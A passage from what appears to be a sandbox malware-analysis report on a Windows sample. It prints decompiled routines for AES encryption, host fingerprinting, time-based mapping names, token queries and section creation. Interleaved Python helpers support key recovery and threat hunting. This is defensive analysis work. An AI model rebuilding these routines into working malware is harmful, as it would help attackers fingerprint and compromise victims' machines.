            							_t85 =  *0x7ea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
            						} else {
            							_t85 =  *0x7ea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
            						}
            						if(_t85 == 0) {
            							break;
            						}
            						_t90 = _v8;            // bytes written by this call (padding included on the final one)
            						_v16 = _v16 + _t90;
            						_t102 = _t102 + _t90;
            						if(_t103 != 0) {
            							continue;
            						} else {
            							L17:
            							 *_a16 = _v20;     // hand back the buffer and its total length
            							 *_a20 = _v16;
            						}
            						goto L21;
            					}
            					_t86 = GetLastError();
            					_a8 = _t86;
            					if(_t86 != 0) {
            						E007E61DA(_v20);       // free the partial output on failure
            					} else {
            						goto L17;
            					}
            				}
            			}
            			L21:
            			CryptDestroyKey(_v12);
            		}
            		CryptReleaseContext(_v24, 0);
            	}
            	return _a8;                    // 0 on success, otherwise a Win32 error code
            }
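The only secrets in the routine above are the 16 key bytes copied from _a8; everything else is fixed CryptoAPI plumbing: a PLAINTEXTKEYBLOB with bType 8, bVersion 2, aiKeyAlg 0x660e (CALG_AES_128) and cbKeySize 0x10, a zero IV, CBC mode by default, and an output buffer rounded up to the block size with one extra block reserved for PKCS#7 padding when encrypting. The script below is an added example written for this page, not the report's output and not code from the sample; it uses only the Python standard library to build that blob byte-for-byte, parse one back, reproduce the buffer-size arithmetic, and scan a memory image for the 12-byte blob header so the key can be lifted from a dump. The blob here lives on the routine's stack, so it is only present while the routine runs; the key material at _a8 may persist elsewhere. The key and memory image in the usage section are constructed for the example. AES itself is not implemented: once the key is known, decrypting the sample's data means AES-128-CBC with a 16-byte zero IV and PKCS#7 unpadding in any crypto library.

```python
"""CryptoAPI PLAINTEXTKEYBLOB helpers (added example, not the report's or the sample's code).

Mirrors what the decompiled routine does with its key: build the 0x1c-byte blob
handed to CryptImportKey, parse such a blob back into fields, compute the output
buffer size allocated before CryptEncrypt/CryptDecrypt, and locate blobs in a
memory image. Constants are from wincrypt.h; the image under __main__ is constructed.
"""
import struct

PLAINTEXTKEYBLOB = 0x8      # BLOBHEADER.bType
CUR_BLOB_VERSION = 0x2      # BLOBHEADER.bVersion
CALG_AES_128 = 0x660E       # BLOBHEADER.aiKeyAlg
AES_BLOCK = 16
ZERO_IV = bytes(AES_BLOCK)  # what the routine installs with CryptSetKeyParam(KP_IV)

# BLOBHEADER {BYTE bType; BYTE bVersion; WORD reserved; ALG_ID aiKeyAlg;} followed by DWORD cbKeySize
BLOB_HEADER = struct.Struct("<BBHII")


def build_blob(key, alg=CALG_AES_128):
    """PLAINTEXTKEYBLOB exactly as the routine lays it out: 12-byte header + raw key bytes."""
    return BLOB_HEADER.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg, len(key)) + bytes(key)


def parse_blob(blob):
    """Validate a PLAINTEXTKEYBLOB and return its algorithm id and key bytes."""
    if len(blob) < BLOB_HEADER.size:
        raise ValueError("blob shorter than BLOBHEADER + cbKeySize")
    btype, version, reserved, alg, key_len = BLOB_HEADER.unpack_from(blob)
    if btype != PLAINTEXTKEYBLOB or version != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("not a PLAINTEXTKEYBLOB")
    key = blob[BLOB_HEADER.size:BLOB_HEADER.size + key_len]
    if len(key) != key_len:
        raise ValueError("truncated key material")
    return {"alg": alg, "key": key}


def output_size(n, encrypt):
    """Bytes the routine allocates for n input bytes: round up to the block size and,
    when encrypting an exact multiple, add one block so the PKCS#7 padding block fits."""
    size = (n + AES_BLOCK - 1) & ~(AES_BLOCK - 1)
    if encrypt and size == n:
        size += AES_BLOCK
    return size


def find_aes128_keys(image):
    """(offset, key) for every AES-128 PLAINTEXTKEYBLOB header found in a memory image."""
    header = BLOB_HEADER.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_AES_128, AES_BLOCK)
    hits = []
    pos = image.find(header)
    while pos != -1:
        start = pos + len(header)
        if len(image) >= start + AES_BLOCK:
            hits.append((pos, image[start:start + AES_BLOCK]))
        pos = image.find(header, pos + 1)
    return hits


if __name__ == "__main__":
    key = bytes(range(16))                                # constructed key, not from the sample
    image = b"\x00" * 7 + build_blob(key) + b"\xff" * 5   # constructed memory image
    for off, k in find_aes128_keys(image):
        blob = parse_blob(image[off:off + BLOB_HEADER.size + AES_BLOCK])
        print(hex(off), k.hex(), blob["alg"] == CALG_AES_128)
```

The header search is the part worth keeping in a toolbox: `08 02 00 00 0e 66 00 00 10 00 00 00` is a fixed 12-byte prefix for every AES-128 plaintext key blob handed to CryptImportKey, so a process dump taken while such a routine is active can be grepped for it directly, and the 16 bytes that follow are the key.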


            APIs
            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,007E5088,00000001,007E3ECE,00000000), ref: 007E1540
            • memcpy.NTDLL(007E5088,007E3ECE,00000010,?,?,?,007E5088,00000001,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740), ref: 007E1559
            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 007E1582
            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 007E159A
            • memcpy.NTDLL(00000000,7491C740,02F19600,00000010), ref: 007E15EC
            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02F19600,00000020,?,?,00000010), ref: 007E1615
            • GetLastError.KERNEL32(?,?,00000010), ref: 007E1644
            • GetLastError.KERNEL32 ref: 007E1676
            • CryptDestroyKey.ADVAPI32(00000000), ref: 007E1682
            • GetLastError.KERNEL32 ref: 007E168A
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 007E1697
            • GetLastError.KERNEL32(?,?,?,007E5088,00000001,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E169F
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
            • String ID:
            • API String ID: 3401600162-0
            • Opcode ID: 44d91918d65bce639972546cb792f2d692c09fe946548c8e80ede90ccffe6869
            • Instruction ID: f0c7e8f706b8755f921807f829077c152f79bcfcb47c73a06d5b6aa845269f64
            • Opcode Fuzzy Hash: 44d91918d65bce639972546cb792f2d692c09fe946548c8e80ede90ccffe6869
            • Instruction Fuzzy Hash: 0B517BB1901289FFDB10DFA5CC89AAE7BB9FB48340F148429F915E6150D7789E14DB21
            Uniqueness

            Uniqueness Score: -1.00%
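            The CryptoAPI sequence listed above for the function at 007E1540 is the shape of a symmetric encryption with a raw key: CryptAcquireContextW with provider type 0x18 (PROV_RSA_AES) and flags 0xF0000000 (CRYPT_VERIFYCONTEXT), a 0x10-byte memcpy, CryptImportKey with a 0x1C-byte blob, CryptSetKeyParam with parameter 1 (KP_IV), then CryptEncrypt. 0x1C bytes is exactly an 8-byte BLOBHEADER, a 4-byte key length and a 16-byte key, i.e. a PLAINTEXTKEYBLOB for a 128-bit key. The Python below is an added example, not code from the sample or from the report: it builds and validates such a blob, so that bytes recovered at this call from a memory dump can be checked for consistency before they are used as a key. The ALG_ID the sample uses is not visible in the listing; treating a 16-byte key as CALG_AES_128 is an assumption of the example.

```python
import struct

# wincrypt.h constants seen in the listing
PROV_RSA_AES = 0x18
CRYPT_VERIFYCONTEXT = 0xF0000000
KP_IV = 1
# PLAINTEXTKEYBLOB layout: BLOBHEADER (8 bytes), DWORD key length, raw key bytes
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
CALG_AES_128, CALG_AES_192, CALG_AES_256 = 0x660E, 0x660F, 0x6610
AES_KEY_BYTES = {CALG_AES_128: 16, CALG_AES_192: 24, CALG_AES_256: 32}

BLOBHEADER = struct.Struct("<BBHI")      # bType, bVersion, reserved, aiKeyAlg
KEYLEN = struct.Struct("<I")


def expected_blob_length(alg_id):
    """Total CryptImportKey dwDataLen for an AES PLAINTEXTKEYBLOB of the given ALG_ID."""
    return BLOBHEADER.size + KEYLEN.size + AES_KEY_BYTES[alg_id]


def build_plaintext_key_blob(alg_id, key):
    """Construct the blob CryptImportKey expects for a raw symmetric key."""
    expected = AES_KEY_BYTES.get(alg_id)
    if expected is not None and expected != len(key):
        raise ValueError("key length %d does not fit ALG_ID 0x%X" % (len(key), alg_id))
    return (BLOBHEADER.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id)
            + KEYLEN.pack(len(key)) + bytes(key))


def parse_plaintext_key_blob(blob):
    """Validate a blob recovered from memory and return its fields; raises ValueError if malformed."""
    if len(blob) < BLOBHEADER.size + KEYLEN.size:
        raise ValueError("blob shorter than header")
    btype, version, reserved, alg_id = BLOBHEADER.unpack_from(blob, 0)
    if btype != PLAINTEXTKEYBLOB:
        raise ValueError("bType 0x%02X is not PLAINTEXTKEYBLOB" % btype)
    if version != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("unexpected BLOBHEADER version/reserved")
    (key_len,) = KEYLEN.unpack_from(blob, BLOBHEADER.size)
    start = BLOBHEADER.size + KEYLEN.size
    key = bytes(blob[start:start + key_len])
    if len(key) != key_len:
        raise ValueError("key truncated: header says %d bytes, blob has %d" % (key_len, len(key)))
    expected = AES_KEY_BYTES.get(alg_id)
    if expected is not None and expected != key_len:
        raise ValueError("key length %d inconsistent with ALG_ID 0x%X" % (key_len, alg_id))
    return {"alg_id": alg_id, "key_len": key_len, "key": key, "total_len": start + key_len}


def is_plaintext_key_blob(blob):
    """True if the bytes parse as a well-formed PLAINTEXTKEYBLOB."""
    try:
        parse_plaintext_key_blob(blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed key for demonstration only; a real analysis would take these 0x1C
    # bytes from the buffer passed as CryptImportKey's second argument.
    demo = build_plaintext_key_blob(CALG_AES_128, bytes(range(16)))
    print(len(demo), parse_plaintext_key_blob(demo))
```

            A blob that fails this check (wrong bType, version, or a length field that does not match the 0x1C passed to CryptImportKey) means the memcpy'd 0x10 bytes were not the key, and the IV passed via KP_IV should be examined instead.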

            Control-flow Graph

            • Rendered graph not reproduced; basic blocks 7e3bd3 to 7e3cdf, edges labelled GetUserNameW, RtlAllocateHeap, HeapFree and GetComputerNameW, with calls into 7e71cd and 7e56b9.
            C-Code - Quality: 96%
            			E007E3BD3(char __eax, void* __esi) {
            				long _v8;
            				char _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v28;
            				long _t34;
            				signed int _t39;
            				long _t50;
            				char _t59;
            				intOrPtr _t61;
            				void* _t62;
            				void* _t64;
            				char _t65;
            				intOrPtr* _t67;
            				void* _t68;
            				void* _t69;
            
            				_t69 = __esi;
            				_t65 = __eax;
            				_v8 = 0;
            				_v12 = __eax;
            				if(__eax == 0) {
            					_t59 =  *0x7ea310; // 0xd448b889
            					_v12 = _t59;
            				}
            				_t64 = _t69;
            				E007E71CD( &_v12, _t64);
            				if(_t65 != 0) {
            					 *_t69 =  *_t69 ^  *0x7ea344 ^ 0x6c7261ae;
            				} else {
            					GetUserNameW(0,  &_v8); // executed
            					_t50 = _v8;
            					if(_t50 != 0) {
            						_t62 = RtlAllocateHeap( *0x7ea2d8, 0, _t50 + _t50);
            						if(_t62 != 0) {
            							if(GetUserNameW(_t62,  &_v8) != 0) {
            								_t64 = _t62;
            								 *_t69 =  *_t69 ^ E007E56B9(_v8 + _v8, _t64);
            							}
            							HeapFree( *0x7ea2d8, 0, _t62);
            						}
            					}
            				}
            				_t61 = __imp__;
            				_v8 = _v8 & 0x00000000;
            				GetComputerNameW(0,  &_v8);
            				_t34 = _v8;
            				if(_t34 != 0) {
            					_t68 = RtlAllocateHeap( *0x7ea2d8, 0, _t34 + _t34);
            					if(_t68 != 0) {
            						if(GetComputerNameW(_t68,  &_v8) != 0) {
            							_t64 = _t68;
            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E007E56B9(_v8 + _v8, _t64);
            						}
            						HeapFree( *0x7ea2d8, 0, _t68);
            					}
            				}
            				asm("cpuid");
            				_t67 =  &_v28;
            				 *_t67 = 1;
            				 *((intOrPtr*)(_t67 + 4)) = _t61;
            				 *((intOrPtr*)(_t67 + 8)) = 0;
            				 *(_t67 + 0xc) = _t64;
            				_t39 = _v16 ^ _v20 ^ _v28;
            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
            				return _t39;
            			}

            APIs
            • GetUserNameW.ADVAPI32(00000000,?), ref: 007E3C0A
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 007E3C21
            • GetUserNameW.ADVAPI32(00000000,?), ref: 007E3C2E
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E3C4F
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 007E3C76
            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 007E3C8A
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 007E3C97
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E3CB5
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: HeapName$AllocateComputerFreeUser
            • String ID:
            • API String ID: 3239747167-0
            • Opcode ID: be49a5218d65a391a85a86adc3f22a1767e76c2c5d51182e5427c2be799e71c7
            • Instruction ID: ed52ca62ade6125882aa75a57f73324f36b08506d6e335cb243e8f915f327f5b
            • Opcode Fuzzy Hash: be49a5218d65a391a85a86adc3f22a1767e76c2c5d51182e5427c2be799e71c7
            • Instruction Fuzzy Hash: 7B312D72601245EFD710DF69CDC5A6AB7F9FB4C700F618429E505E7260E738EE109B24
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Rendered graph not reproduced; basic blocks 4015b0 to 40167f, edges labelled GetSystemTimeAsFileTime, CreateFileMappingW, GetLastError, MapViewOfFile and CloseHandle.
            C-Code - Quality: 69%
            			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
            				intOrPtr _v12;
            				struct _FILETIME* _v16;
            				short _v60;
            				struct _FILETIME* _t14;
            				intOrPtr _t15;
            				long _t18;
            				void* _t19;
            				void* _t22;
            				intOrPtr _t31;
            				long _t32;
            				void* _t34;
            
            				_t31 = __edx;
            				_t14 =  &_v16;
            				GetSystemTimeAsFileTime(_t14);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v12);
            				_push(_v16);
            				L00402026();
            				_push(_t14);
            				_v16 = _t14;
            				_t15 =  *0x404184;
            				_push(_t15 + 0x4051ca);
            				_push(_t15 + 0x4051c0);
            				_push(0x16);
            				_push( &_v60);
            				_v12 = _t31;
            				L00402020();
            				_t18 = _a4;
            				if(_t18 == 0) {
            					_t18 = 0x1000;
            				}
            				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
            				_t34 = _t19;
            				if(_t34 == 0) {
            					_t32 = GetLastError();
            				} else {
            					if(_a4 != 0 || GetLastError() == 0xb7) {
            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
            						if(_t22 == 0) {
            							_t32 = GetLastError();
            							if(_t32 != 0) {
            								goto L9;
            							}
            						} else {
            							 *_a8 = _t34;
            							 *_a12 = _t22;
            							_t32 = 0;
            						}
            					} else {
            						_t32 = 2;
            						L9:
            						CloseHandle(_t34);
            					}
            				}
            				return _t32;
            			}

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
            • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
            • String ID:
            • API String ID: 3812556954-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
            Uniqueness

            Uniqueness Score: -1.00%
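            E004015B0 derives the mapping name from the clock. GetSystemTimeAsFileTime is followed by a 64-bit division (L00402026 is read here as the compiler's 64-bit division helper, which is an assumption) by the constant pushed as the two DWORDs 0x192 and 0x54d38000; that 64-bit value is 1,728,000,000,000 100-ns ticks, exactly 48 hours. The quotient is then formatted into _v60 using strings at 0x4051c0 and 0x4051ca that the listing does not show, so the final name layout is not recoverable here. The remainder is CreateFileMappingW(INVALID_HANDLE_VALUE, attributes at 0x404188, PAGE_READWRITE, 0, size or 0x1000, name): with a non-zero _a4 it creates the object; with _a4 == 0 it only proceeds if GetLastError() is 0xB7 (ERROR_ALREADY_EXISTS), otherwise it closes the handle and returns 2. MapViewOfFile uses access 6 (FILE_MAP_READ | FILE_MAP_WRITE). The Python below is an added example, not the sample's or the report's code: it computes the 48-hour bucket value and the UTC window in which it is current, so a name observed in one run can be related to the interval during which the same name would be produced.

```python
# Added example: the 48-hour time bucket behind E004015B0's mapping name.
FILETIME_UNIX_EPOCH = 116444736000000000   # 100-ns ticks from 1601-01-01 to 1970-01-01
TICKS_PER_SECOND = 10_000_000

# The two DWORDs pushed before the 64-bit division: high 0x192, low 0x54d38000.
BUCKET_TICKS = (0x192 << 32) | 0x54D38000


def unix_to_filetime(unix_seconds):
    """Convert a Unix timestamp (seconds) to a Windows FILETIME tick count."""
    return int(unix_seconds) * TICKS_PER_SECOND + FILETIME_UNIX_EPOCH


def filetime_to_unix(filetime):
    """Convert a FILETIME tick count to Unix seconds (floor)."""
    return (filetime - FILETIME_UNIX_EPOCH) // TICKS_PER_SECOND


def bucket_for_filetime(filetime):
    """The quotient the sample feeds into its name format: FILETIME // 48h."""
    return filetime // BUCKET_TICKS


def bucket_window_unix(bucket):
    """Inclusive start and exclusive end (Unix seconds) during which a bucket value is current."""
    start = bucket * BUCKET_TICKS
    return filetime_to_unix(start), filetime_to_unix(start + BUCKET_TICKS)


def buckets_for_range(unix_start, unix_end):
    """Every bucket value a host would have produced between two Unix timestamps (inclusive)."""
    first = bucket_for_filetime(unix_to_filetime(unix_start))
    last = bucket_for_filetime(unix_to_filetime(unix_end))
    return list(range(first, last + 1))


if __name__ == "__main__":
    import time
    now = time.time()
    current = bucket_for_filetime(unix_to_filetime(now))
    print("divisor = %d ticks = %d h" % (BUCKET_TICKS, BUCKET_TICKS // TICKS_PER_SECOND // 3600))
    print("current bucket %d, valid for Unix seconds %s" % (current, bucket_window_unix(current)))
```

            Because the Unix epoch happens to fall on a bucket boundary, the windows are aligned to multiples of 172800 s from 1970-01-01 00:00 UTC; a mapping or mutex name built from this value is therefore only a stable indicator for two days, and a hunt over older telemetry has to enumerate the buckets for the period of interest.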

            Control-flow Graph

            C-Code - Quality: 38%
            			E007E421F(char _a4, void* _a8) {
            				void* _v8;
            				void* _v12;
            				char _v16;
            				void* _v20;
            				char _v24;
            				char _v28;
            				char _v32;
            				char _v36;
            				char _v40;
            				void* _v44;
            				void** _t33;
            				void* _t40;
            				void* _t43;
            				void** _t44;
            				intOrPtr* _t47;
            				char _t48;
            
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v20 = _a4;
            				_t48 = 0;
            				_v16 = 0;
            				_a4 = 0;
            				_v44 = 0x18;
            				_v40 = 0;
            				_v32 = 0;
            				_v36 = 0;
            				_v28 = 0;
            				_v24 = 0;
            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
            					_t33 =  &_v8;
            					__imp__(_v12, 8, _t33);
            					if(_t33 >= 0) {
            						_t47 = __imp__;
            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
            						_t44 = E007E33DC(_a4);
            						if(_t44 != 0) {
            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
            							if(_t40 >= 0) {
            								memcpy(_a8,  *_t44, 0x1c);
            								_t48 = 1;
            							}
            							E007E61DA(_t44);
            						}
            						NtClose(_v8); // executed
            					}
            					NtClose(_v12);
            				}
            				return _t48;
            			}

            APIs
            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 007E4266
            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 007E4279
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 007E4295
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 007E42B2
            • memcpy.NTDLL(?,00000000,0000001C), ref: 007E42BF
            • NtClose.NTDLL(?), ref: 007E42D1
            • NtClose.NTDLL(00000000), ref: 007E42DB
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
            • String ID:
            • API String ID: 2575439697-0
            • Opcode ID: 6821abde7f83c43e8cc47b93973194ee6ae32ccc842db9618795f9aecaaeb4ce
            • Instruction ID: cf9bdb74bc41d2b2f4e59987da2384be6dc984b937605d806e178dd438e9cb45
            • Opcode Fuzzy Hash: 6821abde7f83c43e8cc47b93973194ee6ae32ccc842db9618795f9aecaaeb4ce
            • Instruction Fuzzy Hash: 6F2126B290115DEBDB019F95CC85ADEBFBDFB08750F108022FA05E6120D7759B509BA4
            Uniqueness

            Uniqueness Score: -1.00%
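            E007E421F opens a process with PROCESS_QUERY_INFORMATION (0x400), its token with TOKEN_QUERY (8), and calls NtQueryInformationToken with TokenUser (1) twice: first with a null buffer to learn the required size, then with a heap buffer of that size from E007E33DC. TOKEN_USER begins with SID_AND_ATTRIBUTES {PSID Sid; DWORD Attributes;}, so *_t44 is the SID pointer, and the function copies a fixed 0x1C (28) bytes from it into the caller's buffer. 28 bytes is exactly a SID with five sub-authorities, the S-1-5-21-a-b-c-RID form of domain and local account SIDs; well-known SIDs such as S-1-5-18 are shorter, and a fixed copy reads past them. The Python below is an added example, not from the sample or the report: it parses and builds binary SIDs and a 32-bit TOKEN_USER buffer laid out as this function sees it. The buffer address and SID values are constructed.

```python
import struct

# Constants visible in the listing
PROCESS_QUERY_INFORMATION = 0x0400
TOKEN_QUERY = 0x0008
TokenUser = 1
FIXED_SID_COPY = 0x1C          # bytes memcpy'd from the SID regardless of its real length
SID_MAX_SUB_AUTHORITIES = 15


def sid_byte_length(sub_authority_count):
    """Revision(1) + SubAuthorityCount(1) + IdentifierAuthority(6) + 4 * count."""
    return 8 + 4 * sub_authority_count


def build_sid(identifier_authority, sub_authorities):
    """Serialize a SID (revision 1) to its binary form."""
    if len(sub_authorities) > SID_MAX_SUB_AUTHORITIES:
        raise ValueError("too many sub-authorities")
    return (bytes([1, len(sub_authorities)])
            + identifier_authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(sub_authorities), *sub_authorities))


def parse_sid(buf, offset=0):
    """Return (string form, byte length) of the SID at buf[offset:]."""
    if len(buf) < offset + 8:
        raise ValueError("buffer too short for SID header")
    revision, count = buf[offset], buf[offset + 1]
    if revision != 1 or count > SID_MAX_SUB_AUTHORITIES:
        raise ValueError("not a valid SID header")
    length = sid_byte_length(count)
    if len(buf) < offset + length:
        raise ValueError("truncated SID")
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    text = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return text, length


def build_token_user_32(buffer_va, sid_bytes, attributes=0):
    """32-bit TOKEN_USER: {PSID Sid; DWORD Attributes;} with the SID stored inline at +8."""
    return struct.pack("<II", buffer_va + 8, attributes) + sid_bytes


def parse_token_user_32(buf, buffer_va):
    """Read TOKEN_USER the way E007E421F does: dereference the first DWORD as the SID pointer."""
    sid_ptr, attributes = struct.unpack_from("<II", buf, 0)
    offset = sid_ptr - buffer_va
    if not 0 <= offset < len(buf):
        raise ValueError("SID pointer does not point into the buffer")
    text, length = parse_sid(buf, offset)
    return {
        "sid": text,
        "attributes": attributes,
        "sid_length": length,
        # A fixed 0x1C copy reads past any SID shorter than 28 bytes (e.g. S-1-5-18 is 12 bytes)
        "fixed_copy_overreads": length < FIXED_SID_COPY,
    }


if __name__ == "__main__":
    # Constructed values: a fake buffer address and an invented domain SID.
    sid = build_sid(5, [21, 1000, 2000, 3000, 1001])
    print(parse_token_user_32(build_token_user_32(0x20000, sid), 0x20000))
```

            When reconstructing the 28 bytes the sample copies from a dump, run them through parse_sid first: a revision other than 1 or a sub-authority count other than 5 means the copy did not start at the SID, and the pointer at offset 0 of the TOKEN_USER buffer should be followed instead.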

            C-Code - Quality: 72%
            			E0040110B(intOrPtr* __eax, void** _a4) {
            				int _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				int _v28;
            				int _v32;
            				intOrPtr _v36;
            				int _v40;
            				int _v44;
            				void* _v48;
            				void* __esi;
            				long _t34;
            				void* _t39;
            				void* _t47;
            				intOrPtr* _t48;
            
            				_t48 = __eax;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v24 =  *((intOrPtr*)(__eax + 4));
            				_v16 = 0;
            				_v12 = 0;
            				_v48 = 0x18;
            				_v44 = 0;
            				_v36 = 0x40;
            				_v40 = 0;
            				_v32 = 0;
            				_v28 = 0;
            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
            				if(_t34 < 0) {
            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
            				} else {
            					 *_t48 = _v16;
            					_t39 = E00401459(_t48,  &_v12); // executed
            					_t47 = _t39;
            					if(_t47 != 0) {
            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
            					} else {
            						memset(_v12, 0, _v24);
            						 *_a4 = _v12;
            					}
            				}
            				return _t47;
            			}

            APIs
            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            • memset.NTDLL ref: 0040118A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
